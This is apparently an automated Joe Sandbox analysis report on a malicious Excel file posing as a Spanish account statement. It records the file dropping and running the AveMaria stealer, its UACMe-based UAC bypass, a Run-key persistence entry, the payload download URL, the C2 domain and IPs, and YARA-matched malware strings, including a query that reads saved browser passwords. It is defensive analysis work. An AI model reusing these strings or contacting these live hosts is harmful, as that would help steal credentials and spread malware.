Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Estado.de.cuenta.xls

Overview

General Information

Sample name:Estado.de.cuenta.xls
Analysis ID:1574073
MD5:0e3fccb0710d5f645343f0e2085921f2
SHA1:e9122949ab988638db6d8c0af8817b6ea9aa32a3
SHA256:fcc55ce7ed8adcf68a39bcd131de11e4be7b55899f35614fc67b4ce6ae0d6c0f
Tags:xlsuser-abuse_ch
Infos:

Detection

AveMaria, UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AveMaria stealer
Yara detected UACMe UAC Bypass tool
.NET source code contains process injector
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Increases the number of concurrent connection per server for Internet Explorer
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process drops PE file
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3316 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • VPZVQXDUT.exe (PID: 3564 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
      • VPZVQXDUT.exe (PID: 3592 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
      • VPZVQXDUT.exe (PID: 3600 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
        • msimages.exe (PID: 3704 cmdline: "C:\ProgramData\msimages.exe" MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
          • msimages.exe (PID: 3732 cmdline: C:\ProgramData\msimages.exe MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
          • msimages.exe (PID: 3744 cmdline: C:\ProgramData\msimages.exe MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
  • msimages.exe (PID: 3836 cmdline: "C:\ProgramData\msimages.exe" MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
    • msimages.exe (PID: 3864 cmdline: C:\ProgramData\msimages.exe MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
    • msimages.exe (PID: 3872 cmdline: C:\ProgramData\msimages.exe MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Ave Maria, AveMariaRAT, avemariaInformation stealer which uses AutoIT for wrapping.
  • Anunak
https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
NameDescriptionAttributionBlogpost URLsLink
UACMeA toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.uacme
{"C2 url": "dns.stipamana.com", "port": 5220, "Proxy Port": 27904}
SourceRuleDescriptionAuthorStrings
00000006.00000002.374015317.000000000054F000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
      0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
          0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AveMaria_31d2bce9unknownunknown
          • 0x1770c:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
          • 0x15f54:$a2: SMTP Password
          • 0x15194:$a3: select signon_realm, origin_url, username_value, password_value from logins
          • 0x1a3d0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          • 0x17614:$a5: for /F "usebackq tokens=*" %%A in ("
          • 0x15984:$a6: \Torch\User Data\Default\Login Data
          • 0x1a4f0:$a7: /n:%temp%\ellocnak.xml
          • 0x164f0:$a8: "os_crypt":{"encrypted_key":"
          • 0x1a520:$a9: Hey I'm Admin
          • 0x15e1c:$a10: \logins.json
          • 0x16468:$a11: Accounts\Account.rec0
          • 0x14d2c:$a12: warzone160
          • 0x173bc:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
          Click to see the 39 entries
          SourceRuleDescriptionAuthorStrings
          4.2.VPZVQXDUT.exe.3fb01e0.7.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
            4.2.VPZVQXDUT.exe.3fb01e0.7.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
            • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
            4.2.VPZVQXDUT.exe.2783860.4.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
              4.2.VPZVQXDUT.exe.2783860.4.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
              • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
              11.2.msimages.exe.29b1654.1.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
                Click to see the 40 entries

                System Summary

                barindex
                Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3316, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exe
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3316, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" , ProcessId: 3564, ProcessName: VPZVQXDUT.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3316, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" , ProcessId: 3564, ProcessName: VPZVQXDUT.exe
                Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 94.156.167.55, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3316, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3316, Protocol: tcp, SourceIp: 94.156.167.55, SourceIsIpv6: false, SourcePort: 443
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\msimages.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, ProcessId: 3600, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\msimages
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3316, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:54:10.287439+010020367341Malware Command and Control Activity Detected192.168.2.224923187.120.121.1605220TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:54:10.245477+010020367351Malware Command and Control Activity Detected87.120.121.1605220192.168.2.2249231TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:54:10.287439+010028523271Malware Command and Control Activity Detected192.168.2.224923187.120.121.1605220TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:54:10.245477+010028523261Malware Command and Control Activity Detected87.120.121.1605220192.168.2.2249231TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Estado.de.cuenta.xlsAvira: detected
                Source: https://www.stipamana.com/sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exeAvira URL Cloud: Label: malware
                Source: C:\ProgramData\msimages.exeAvira: detection malicious, Label: HEUR/AGEN.1311032
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exeAvira: detection malicious, Label: HEUR/AGEN.1311032
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeAvira: detection malicious, Label: HEUR/AGEN.1311032
                Source: 4.2.VPZVQXDUT.exe.2783860.4.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "dns.stipamana.com", "port": 5220, "Proxy Port": 27904}
                Source: Estado.de.cuenta.xlsReversingLabs: Detection: 50%
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\ProgramData\msimages.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeJoe Sandbox ML: detected
                Source: Estado.de.cuenta.xlsJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040B15E lstrlenA,CryptStringToBinaryA,lstrcpyA,6_2_0040B15E
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040CAFC CryptUnprotectData,LocalAlloc,LocalFree,6_2_0040CAFC
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040CC54 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,6_2_0040CC54
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040CCB4 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,6_2_0040CCB4
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040A632 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,6_2_0040A632
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040CF58 LocalAlloc,BCryptDecrypt,LocalFree,6_2_0040CF58

                Exploits

                barindex
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3fb01e0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.2783860.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.msimages.exe.29b1654.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.msimages.exe.29af650.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.msimages.exe.29cecd8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.27a2ff0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.msimages.exe.29d0cdc.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.374015317.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: VPZVQXDUT.exe PID: 3564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: VPZVQXDUT.exe PID: 3600, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: msimages.exe PID: 3704, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: msimages.exe PID: 3836, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 94.156.167.55:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_00409DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,6_2_00409DF6
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040FF27 FindFirstFileW,FindNextFileW,6_2_0040FF27
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0041002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,6_2_0041002B

                Software Vulnerabilities

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: asxhfzdhhz[1].exe.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                Source: global trafficDNS query: name: www.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global traffic    TCP traffic: 192.168.2.22:49163 <-> 94.156.167.55:443 (one connection, 169 logged segments; the first 48 entries are all client-to-server, 192.168.2.22:49163 -> 94.156.167.55:443, after which client-to-server and server-to-client segments interleave for the remainder of the listing)
                Source: global traffic    TCP traffic: 192.168.2.22:49164 .. 192.168.2.22:49207 -> 87.120.121.160:5220 (44 short connections, one per consecutive ephemeral source port 49164 through 49207, each logged as the same five-segment exchange: client -> server, server -> client, client -> server, server -> client, client -> server)
                Source: global traffic    TCP traffic: 192.168.2.22:49208 -> 87.120.121.160:5220 (same exchange; the first three segments, client -> server, server -> client, client -> server, are logged at this point in the listing)
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49208
                Source: global trafficTCP traffic: 192.168.2.22:49208 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49209 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49209
                Source: global trafficTCP traffic: 192.168.2.22:49209 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49209
                Source: global trafficTCP traffic: 192.168.2.22:49209 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49210 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49210
                Source: global trafficTCP traffic: 192.168.2.22:49210 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49210
                Source: global trafficTCP traffic: 192.168.2.22:49210 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49211 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49211
                Source: global trafficTCP traffic: 192.168.2.22:49211 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49211
                Source: global trafficTCP traffic: 192.168.2.22:49211 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49212 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49212
                Source: global trafficTCP traffic: 192.168.2.22:49212 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49212
                Source: global trafficTCP traffic: 192.168.2.22:49212 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49213 -> 87.120.121.160:5220
